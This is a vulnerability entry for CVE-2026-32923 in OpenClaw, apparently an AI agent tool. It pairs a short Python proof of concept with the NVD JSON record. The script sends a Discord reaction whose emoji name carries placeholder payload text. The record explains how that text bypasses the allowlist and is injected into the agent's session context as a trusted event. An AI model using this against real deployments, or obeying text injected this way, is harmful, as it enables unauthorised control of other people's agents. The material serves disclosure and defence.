CVE-2026-32923

# PoC for CVE-2026-32923: OpenClaw Authorization Bypass # This script demonstrates how a non-allowlisted guild member # can trigger a reaction event that bypasses the allowlist check. import requests def exploit_openclaw(guild_id, channel_id, message_id, attacker_token, emoji_payload): """ Simulates sending a Discord reaction to trigger the vulnerability. """ # Discord API endpoint for adding a reaction url = f"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}/reactions/{emoji_payload}/@me" headers = { "Authorization": attacker_token, "Content-Type": "application/json" } try: # Step 1: Attacker sends a reaction to a message response = requests.put(url, headers=headers) if response.status_code == 204: print("[+] Reaction sent successfully.") print("[+] OpenClaw < 2026.3.11 may ingest this as a trusted system event.") print(f"[+] Payload '{emoji_payload}' potentially injected into session context.") return True else: print(f"[-] Failed to send reaction. Status code: {response.status_code}") return False except Exception as e: print(f"[-] An error occurred: {e}") return False # Example Usage if __name__ == "__main__": # Replace with actual target details TARGET_GUILD = "123456789" TARGET_CHANNEL = "987654321" TARGET_MESSAGE = "111111111" ATTACKER_TOKEN = "ATTACKER_BOT_TOKEN_HERE" # The emoji name acts as the payload text PAYLOAD = "malicious_emoji_name" exploit_openclaw(TARGET_GUILD, TARGET_CHANNEL, TARGET_MESSAGE, ATTACKER_TOKEN, PAYLOAD)

{"cve": {"id": "CVE-2026-32923", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:00.767", "lastModified": "2026-03-31T18:01:13.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.11 contains an authorization bypass vulnerability in Discord guild reaction ingestion that fails to enforce member users and roles allowlist checks. Non-allowlisted guild members can trigger reaction events accepted as trusted system events, injecting reaction text into downstream session context."}, {"lang": "es", "value": "OpenClaw anterior a 2026.3.11 contiene una vulnerabilidad de omisión de autorización en la ingesta de reacciones de gremios de Discord que no aplica las comprobaciones de lista blanca de usuarios y roles de miembros. Los miembros del gremio no incluidos en la lista blanca pueden desencadenar eventos de reacción aceptados como eventos de sistema de confianza, inyectando texto de reacción en el contexto de sesión posterior."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.11", "matchCriteriaId": "4B01F0B5-B0CB-462E-A546-2BA2CACD83D5"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-guild-reaction-allowlist-enforcement", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}